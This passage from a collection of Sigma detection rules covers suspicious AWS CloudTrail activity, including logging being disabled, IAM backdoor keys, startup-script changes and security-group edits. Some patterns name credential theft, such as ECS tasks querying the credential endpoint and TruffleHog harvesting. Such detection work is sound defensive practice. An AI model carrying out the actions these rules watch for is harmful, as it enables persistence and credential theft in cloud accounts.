    - https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/
    - https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things
author: jamesc-grafana
date: 2024-07-11
tags:
    - attack.privilege-escalation
    - attack.defense-evasion
    - attack.initial-access
    - attack.persistence
    - attack.t1078
    - attack.t1078.002
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        userIdentity.arn|re: '.+:assumed-role/aws:.+'
    filter_main_generic:
        - eventSource: 'ssm.amazonaws.com'
        - eventName: 'RegisterManagedInstance'
        - sourceIPAddress: 'AWS Internal'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml
================================================
title: New Network ACL Entry Added
id: e1f7febb-7b94-4234-b5c6-00fb8500f5dd
status: test
description: |
    Detects that an entry has been added to a VPC network ACL (CreateNetworkAclEntry), which could indicate that new attack
vectors have been opened up in the AWS account. references: - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ author: jamesc-grafana date: 2024-07-11 tags: - attack.defense-evasion - attack.t1562.007 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'ec2.amazonaws.com' eventName: 'CreateNetworkAclEntry' condition: selection falsepositives: - Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml ================================================ title: New Network Route Added id: c803b2ce-c4a2-4836-beae-b112010390b1 status: test description: | Detects the addition of a new network route to a route table in AWS. references: - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ author: jamesc-grafana date: 2024-07-11 tags: - attack.defense-evasion - attack.t1562.007 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'ec2.amazonaws.com' eventName: 'CreateRoute' condition: selection falsepositives: - New VPC Creation requiring setup of a new route table - New subnets added requiring routing setup level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_pua_trufflehog.yml ================================================ title: PUA - AWS TruffleHog Execution id: a840e606-7c8c-4684-9bc1-eb6b6155127f status: experimental description: | Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment. It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious. 
references: - https://github.com/trufflesecurity/trufflehog - https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/ author: Swachchhanda Shrawan Poudel (Nextron Systems) date: 2025-10-21 tags: - attack.credential-access - attack.t1555 - attack.t1003 logsource: product: aws service: cloudtrail detection: selection: userAgent: 'TruffleHog' condition: selection falsepositives: - Legitimate use of TruffleHog by security teams for credential scanning. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_region_enabled.yml ================================================ title: AWS EnableRegion Command Monitoring id: a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab status: experimental description: | Detects the use of the EnableRegion command in AWS CloudTrail logs. While AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately. There may be situations where security monitoring does not cover some new AWS regions. Monitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment. references: - https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html - https://awscli.amazonaws.com/v2/documentation/api/2.14.0/reference/account/enable-region.html author: Ivan Saakov, Sergey Zelenskiy date: 2025-10-19 tags: - attack.persistence logsource: product: aws service: cloudtrail detection: selection: eventName: 'EnableRegion' eventSource: 'account.amazonaws.com' condition: selection falsepositives: - Legitimate use of the EnableRegion command by authorized administrators. 
level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml ================================================ title: Ingress/Egress Security Group Modification id: 6fb77778-040f-4015-9440-572aa9b6b580 status: test description: | Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server. references: - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ author: jamesc-grafana date: 2024-07-11 tags: - attack.initial-access - attack.t1190 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'ec2.amazonaws.com' eventName: - 'AuthorizeSecurityGroupEgress' - 'AuthorizeSecurityGroupIngress' - 'RevokeSecurityGroupEgress' - 'RevokeSecurityGroupIngress' condition: selection falsepositives: - New VPCs and Subnets being setup requiring a different security profile to those already defined - A single port being opened for a new service that is known to be deploying - Administrators closing unused ports to reduce the attack surface level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml ================================================ title: LoadBalancer Security Group Modification id: 7a4409fc-f8ca-45f6-8006-127d779eaad9 status: test description: | Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). 
This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account. references: - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ author: jamesc-grafana date: 2024-07-11 tags: - attack.initial-access - attack.t1190 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'elasticloadbalancing.amazonaws.com' eventName: - 'ApplySecurityGroupsToLoadBalancer' - 'SetSecurityGroups' condition: selection falsepositives: - Repurposing of an ELB or ALB to serve a different or additional application - Changes to security groups to allow for new services to be deployed level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml ================================================ title: RDS Database Security Group Modification id: 14f3f1c8-02d5-43a2-a191-91ffb52d3015 status: test description: | Detects changes to the security group entries for RDS databases. This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users. 
references: - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ author: jamesc-grafana date: 2024-07-11 tags: - attack.initial-access - attack.t1190 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'rds.amazonaws.com' eventName: - 'AuthorizeDBSecurityGroupIngress' - 'CreateDBSecurityGroup' - 'DeleteDBSecurityGroup' - 'RevokeDBSecurityGroupIngress' condition: selection falsepositives: - Creation of a new Database that needs new security group rules level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml ================================================ title: Potential Malicious Usage of CloudTrail System Manager id: 38e7f511-3f74-41d4-836e-f57dfa18eead status: test description: | Detect when System Manager successfully executes commands against an instance. references: - https://github.com/elastic/detection-rules/blob/v8.6.0/rules/integrations/aws/initial_access_via_system_manager.toml author: jamesc-grafana date: 2024-07-11 modified: 2025-12-08 tags: - attack.privilege-escalation - attack.initial-access - attack.t1566 - attack.t1566.002 logsource: product: aws service: cloudtrail detection: selection_event: eventName: 'SendCommand' eventSource: 'ssm.amazonaws.com' selection_status_success: errorCode: 'Success' selection_status_null: errorCode: null condition: selection_event and 1 of selection_status_* falsepositives: - There are legitimate uses of SSM to send commands to EC2 instances - Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_vpc_flow_logs_deleted.yml ================================================ title: AWS VPC Flow Logs Deleted id: e386b9b5-af12-450e-afff-761730fb8a98 status: experimental description: | Detects the deletion 
of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call. Adversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations. references: - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html - https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/integrations/aws/defense_evasion_ec2_flow_log_deletion author: Ivan Saakov date: 2025-10-19 tags: - attack.defense-evasion logsource: product: aws service: cloudtrail detection: selection_event_name: eventName: 'DeleteFlowLogs' selection_status_success: errorCode: 'Success' selection_status_null: errorCode: null condition: selection_event_name and 1 of selection_status_* falsepositives: - During maintenance operations or testing, authorized administrators may delete VPC Flow Logs as part of routine network management or cleanup activities. 
level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml ================================================ title: AWS Config Disabling Channel/Recorder id: 07330162-dba1-4746-8121-a9647d49d297 status: test description: Detects AWS Config Service disabling references: - https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html author: vitaliy0x1 date: 2020-01-21 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1562.008 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'config.amazonaws.com' eventName: - 'DeleteDeliveryChannel' - 'StopConfigurationRecorder' condition: selection falsepositives: - Valid change in AWS Config Service level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml ================================================ title: AWS Console GetSigninToken Potential Abuse id: f8103686-e3e8-46f3-be72-65f7fcb4aa53 status: test description: | Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request. 
references: - https://github.com/NetSPI/aws_consoler - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/ author: Chester Le Bron (@123Le_Bron) date: 2024-02-26 tags: - attack.lateral-movement - attack.defense-evasion - attack.t1021.007 - attack.t1550.001 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'signin.amazonaws.com' eventName: 'GetSigninToken' filter_main_console_ua: userAgent|contains: 'Jersey/${project.version}' condition: selection and not 1 of filter_main_* falsepositives: - GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_delete_identity.yml ================================================ title: SES Identity Has Been Deleted id: 20f754db-d025-4a8f-9d74-e0037e999a9a status: test description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. 
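This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
references:
    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
author: Janantha Marasinghe
date: 2022-12-13
modified: 2022-12-28
tags:
    - attack.defense-evasion
    - attack.t1070
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventSource: 'ses.amazonaws.com'
        eventName: 'DeleteIdentity'
    condition: selection
falsepositives:
    - Unknown
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_delete_saml_provider.yml
================================================
title: AWS SAML Provider Deletion Activity
id: ccd6a6c8-bb4e-4a91-9d2a-07e632819374
status: experimental
description: |
    Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.
    An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
references:
    - https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html
author: Ivan Saakov
date: 2024-12-19
# NOTE(review): detection logic changed below - set the `modified` date when merging.
tags:
    - attack.t1078.004
    - attack.privilege-escalation
    - attack.defense-evasion
    - attack.initial-access
    - attack.persistence
    - attack.t1531
    - attack.impact
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventSource: 'iam.amazonaws.com'
        eventName: 'DeleteSAMLProvider'
    # Only successful deletions matter here. `status` is not a CloudTrail record
    # field, so the previous `status: 'success'` selector could never match.
    # CloudTrail records success by omitting errorCode, and some pipelines
    # normalise that to the literal 'Success'; match both, as the other deletion
    # rules in this directory do (DeleteBucket, DeleteFlowLogs, DeleteDetector).
    selection_status_success:
        errorCode: 'Success'
    selection_status_null:
        errorCode: null
    condition: selection and 1 of selection_status_*
falsepositives:
    - Automated processes using tools like Terraform may trigger this alert.
    - Legitimate administrative actions by authorized system administrators could cause this alert. Verify the user identity, user agent, and source IP address to ensure they are expected.
    - Deletions by unfamiliar users should be investigated. If the behavior is known and expected, it can be exempted from the rule.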
level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml ================================================ title: AWS S3 Bucket Versioning Disable id: a136ac98-b2bc-4189-a14d-f0d0388e57a7 status: test description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. references: - https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82 author: Sean Johnstone | Unit 42 date: 2023-10-28 tags: - attack.impact - attack.t1490 logsource: product: aws service: cloudtrail detection: selection: eventSource: s3.amazonaws.com eventName: PutBucketVersioning requestParameters|contains: 'Suspended' condition: selection falsepositives: - AWS administrator legitimately disabling bucket versioning level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml ================================================ title: AWS EC2 Disable EBS Encryption id: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 status: stable description: | Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. references: - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html author: Sittikorn S date: 2021-06-29 modified: 2021-08-20 tags: - attack.impact - attack.t1486 - attack.t1565 logsource: product: aws service: cloudtrail detection: selection: eventSource: ec2.amazonaws.com eventName: DisableEbsEncryptionByDefault condition: selection falsepositives: - System Administrator Activities - DEV, UAT, SAT environment. You should apply this rule with PROD account only. 
level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_ec2_import_key_pair_activity.yml ================================================ title: AWS Key Pair Import Activity id: 92f84194-8d9a-4ee0-8699-c30bfac59780 status: experimental description: | Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations. references: - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html author: Ivan Saakov date: 2024-12-19 tags: - attack.initial-access - attack.defense-evasion - attack.t1078 - attack.persistence - attack.privilege-escalation logsource: product: aws service: cloudtrail detection: selection: eventSource: 'ec2.amazonaws.com' eventName: 'ImportKeyPair' condition: selection falsepositives: - Legitimate administrative actions by authorized users importing keys for valid purposes. - Automated processes for infrastructure setup may trigger this alert. - Verify the user identity, user agent, and source IP address to ensure they are expected. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml ================================================ title: AWS EC2 Startup Shell Script Change id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df status: test description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. 
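references:
    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9
author: faloker
date: 2020-02-12
modified: 2022-06-07
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
    - attack.t1059.004
logsource:
    product: aws
    service: cloudtrail
detection:
    selection_source:
        eventSource: ec2.amazonaws.com
        requestParameters.attribute: 'userData'
        eventName: ModifyInstanceAttribute
    condition: selection_source
falsepositives:
    - Valid changes to the startup script
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml
================================================
title: AWS EC2 VM Export Failure
id: 54b9a76a-3c71-4673-b4b3-2edb4566ea7b
status: test
description: |
    Detects a CreateInstanceExportTask request to export an AWS EC2 instance. A VM Export might indicate an attempt to extract information from an instance.
    Note that, despite the title, events carrying an errorCode/errorMessage or a "Failure" response are filtered out, so the rule fires on export tasks that were accepted rather than on failed attempts.
references:
    - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance
author: Diogo Braz
date: 2020-04-16
modified: 2022-10-05
# NOTE(review): falsepositives section added - set the `modified` date when merging.
tags:
    - attack.collection
    - attack.t1005
    - attack.exfiltration
    - attack.t1537
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventName: 'CreateInstanceExportTask'
        eventSource: 'ec2.amazonaws.com'
    # `|contains: '*'` matches any event where the field is present with a value,
    # i.e. the request errored; such events are excluded by the condition below.
    filter1:
        errorMessage|contains: '*'
    filter2:
        errorCode|contains: '*'
    filter3:
        responseElements|contains: 'Failure'
    condition: selection and not 1 of filter*
falsepositives:
    - Legitimate instance exports performed by administrators (e.g. for migration or backup)
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml
================================================
title: AWS ECS Task Definition That Queries The Credential Endpoint
id: b94bf91e-c2bf-4047-9c43-c6810f43baad
status: test
description: |
    Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.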
This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
references:
    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py
    - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html
    - https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html
author: Darin Smith
date: 2022-06-07
modified: 2023-04-24
tags:
    - attack.persistence
    - attack.t1525
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventSource: 'ecs.amazonaws.com'
        eventName:
            - 'DescribeTaskDefinition'
            - 'RegisterTaskDefinition'
            - 'RunTask'
        requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
    condition: selection
falsepositives:
    - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml
================================================
title: AWS EFS Fileshare Modified or Deleted
id: 25cb1ba1-8a19-4a23-a198-d252664c8cef
status: test
description: |
    Detects when an EFS file system is deleted (the rule matches the DeleteFileSystem event).
    You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount target will occur before deletion of the file system.
references:
    - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html
author: Austin Songer @austinsonger
date: 2021-08-15
modified: 2022-10-09
tags:
    - attack.impact
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventSource: elasticfilesystem.amazonaws.com
        eventName: DeleteFileSystem
    condition: selection
falsepositives:
    - Unknown
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml
================================================
title: AWS EFS Fileshare Mount Modified or Deleted
id: 6a7ba45c-63d8-473e-9736-2eaabff79964
status: test
description: Detects when an EFS file share mount target is deleted (the rule matches the DeleteMountTarget event). Deleting a mount target breaks access to the file system through it, which might disrupt instances or applications using those mounts.
references:
    - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html
author: Austin Songer @austinsonger
date: 2021-08-15
modified: 2022-10-09
tags:
    - attack.impact
    - attack.t1485
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventSource: elasticfilesystem.amazonaws.com
        eventName: DeleteMountTarget
    condition: selection
falsepositives:
    - Unknown
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml
================================================
title: AWS EKS Cluster Created or Deleted
id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0
status: test
description: Identifies when an EKS cluster is created or deleted.
references: - https://any-api.com/amazonaws_com/eks/docs/API_Description author: Austin Songer date: 2021-08-16 modified: 2022-10-09 tags: - attack.impact - attack.t1485 logsource: product: aws service: cloudtrail detection: selection: eventSource: eks.amazonaws.com eventName: - CreateCluster - DeleteCluster condition: selection falsepositives: - EKS Cluster being created or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml ================================================ title: AWS ElastiCache Security Group Created id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 status: test description: Detects when an ElastiCache security group has been created. references: - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml author: Austin Songer @austinsonger date: 2021-07-24 modified: 2022-10-09 tags: - attack.persistence - attack.t1136 - attack.t1136.003 logsource: product: aws service: cloudtrail detection: selection: eventSource: elasticache.amazonaws.com eventName: 'CreateCacheSecurityGroup' condition: selection falsepositives: - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml
================================================
title: AWS ElastiCache Security Group Modified or Deleted
id: 7c797da2-9cf2-4523-ba64-33b06339f0cc
status: test
description: Identifies when an ElastiCache security group has been modified or deleted.
references:
    - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-10-09
tags:
    - attack.impact
    - attack.t1531
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventSource: elasticache.amazonaws.com
        eventName:
            - 'DeleteCacheSecurityGroup'
            - 'AuthorizeCacheSecurityGroupIngress'
            - 'RevokeCacheSecurityGroupIngress'
            - 'AuthorizeCacheSecurityGroupEgress'
            - 'RevokeCacheSecurityGroupEgress'
    condition: selection
falsepositives:
    - An ElastiCache security group modification or deletion may be performed by a system or network administrator. Verify whether the user identity, user agent, and/or source IP address should be making changes in your environment. Security group modifications or deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_enum_buckets.yml
================================================
title: Potential Bucket Enumeration on AWS
id: f305fd62-beca-47da-ad95-7690a0620084
related:
    - id: 4723218f-2048-41f6-bcb0-417f2d784f61
      type: similar
status: test
description: Looks for potential enumeration of AWS buckets via ListBuckets.
references: - https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md - https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html - https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/ author: Christopher Peacock @securepeacock, SCYTHE @scythe_io date: 2023-01-06 modified: 2024-07-10 tags: - attack.discovery - attack.t1580 - attack.t1619 logsource: product: aws service: cloudtrail detection: selection: eventSource: 's3.amazonaws.com' eventName: 'ListBuckets' filter: userIdentity.type: 'AssumedRole' condition: selection and not filter falsepositives: - Administrators listing buckets; it may be necessary to filter out users who commonly conduct this activity. Note that the filter already excludes AssumedRole identities, so what remains are calls made by IAM users (long-lived access keys) and the root user; an attacker who has assumed a role is not caught by this rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml ================================================ title: AWS GuardDuty Important Change id: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 status: test description: Detects the creation of a GuardDuty trusted IP list (CreateIPSet). An attacker who can add their own addresses to a trusted IP list suppresses GuardDuty findings for traffic from those addresses. The selection matches only the creation of a list; changes to an existing trusted IP list are not covered by this rule. references: - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9 author: faloker date: 2020-02-11 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1562.001 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: guardduty.amazonaws.com eventName: CreateIPSet condition: selection_source falsepositives: - Valid change in the GuardDuty (e.g. 
to ignore internal scanners) level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml ================================================ title: AWS IAM Backdoor Users Keys id: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 status: test description: | Detects the creation of an AWS access key for an IAM user by a different principal. Backdoored users can be used to obtain persistence in the AWS environment. This alert also gives visibility into how access keys are issued across the organization. references: - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py author: faloker date: 2020-02-12 modified: 2022-10-09 tags: - attack.persistence - attack.privilege-escalation - attack.t1098 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: iam.amazonaws.com eventName: CreateAccessKey filter: userIdentity.arn|contains: responseElements.accessKey.userName condition: selection_source and not filter falsepositives: - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming). Note that the filter value is a literal string, not a field reference (compare the |fieldref modifier used in the AWS User Login Profile Was Modified rule), so self-service key creation is in practice not excluded by this filter and must be tuned per environment or rewritten with a field reference. - AWS API keys legitimate exchange workflows level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml ================================================ title: AWS IAM S3Browser LoginProfile Creation id: db014773-b1d3-46bd-ba26-133337c0ffee status: test description: Detects the S3 Browser utility performing reconnaissance, looking for existing IAM users without a LoginProfile defined and then (when found) creating a LoginProfile, which gives the attacker console access to that user. 
references: - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor author: daniel.bohannon@permiso.io (@danielhbohannon) date: 2023-05-17 tags: - attack.execution - attack.persistence - attack.defense-evasion - attack.initial-access - attack.privilege-escalation - attack.t1059.009 - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'iam.amazonaws.com' eventName: - 'GetLoginProfile' - 'CreateLoginProfile' userAgent|contains: 'S3 Browser' condition: selection falsepositives: - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation. The match relies on the user agent string, which a tool or attacker can change, so absence of this alert does not rule out the activity. level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml ================================================ title: AWS IAM S3Browser Templated S3 Bucket Policy Creation id: db014773-7375-4f4e-b83b-133337c0ffee status: test description: Detects the S3 Browser utility creating an inline IAM user policy that still contains the default S3 bucket name placeholder from its policy template. The placeholder token has been stripped from this rendering (it appears here as "" and the ARN in the detection below reads arn:aws:s3:::/*); the rule only matches templated policies when that token is present in the requestParameters pattern. 
references: - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor author: daniel.bohannon@permiso.io (@danielhbohannon) date: 2023-05-17 tags: - attack.execution - attack.t1059.009 - attack.persistence - attack.defense-evasion - attack.initial-access - attack.privilege-escalation - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection: eventSource: iam.amazonaws.com eventName: PutUserPolicy userAgent|contains: 'S3 Browser' requestParameters|contains|all: - '"arn:aws:s3:::/*"' - '"s3:GetObject"' - '"Allow"' condition: selection falsepositives: - Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml ================================================ title: AWS IAM S3Browser User or AccessKey Creation id: db014773-d9d9-4792-91e5-133337c0ffee status: test description: Detects S3 Browser utility creating IAM User or AccessKey. 
references: - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor author: daniel.bohannon@permiso.io (@danielhbohannon) date: 2023-05-17 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.defense-evasion - attack.initial-access - attack.t1059.009 - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'iam.amazonaws.com' eventName: - 'CreateUser' - 'CreateAccessKey' userAgent|contains: 'S3 Browser' condition: selection falsepositives: - Valid usage of S3 Browser for IAM User and/or AccessKey creation level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_kms_import_key_material.yml ================================================ title: AWS KMS Imported Key Material Usage id: 1279262f-1464-422f-ac0d-5b545320c526 status: experimental description: | Detects the import or deletion of key material in AWS KMS, which can be used as part of ransomware attacks. This activity is uncommon and provides a high certainty signal. references: - https://www.chrisfarris.com/post/effective-aws-ransomware/ - https://docs.aws.amazon.com/kms/latest/developerguide/ct-importkeymaterial.html - https://docs.aws.amazon.com/kms/latest/developerguide/ct-deleteimportedkeymaterial.html author: toopricey date: 2025-10-18 tags: - attack.impact - attack.t1486 - attack.resource-development - attack.t1608.003 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'kms.amazonaws.com' eventName: - 'ImportKeyMaterial' - 'DeleteImportedKeyMaterial' condition: selection falsepositives: - Legitimate use cases for imported key material are rare, but may include, Organizations with hybrid cloud architectures that import external key material for compliance requirements. - Development or testing environments that simulate external key management scenarios. Even in these cases, such activity is typically infrequent and should not add significant noise. 
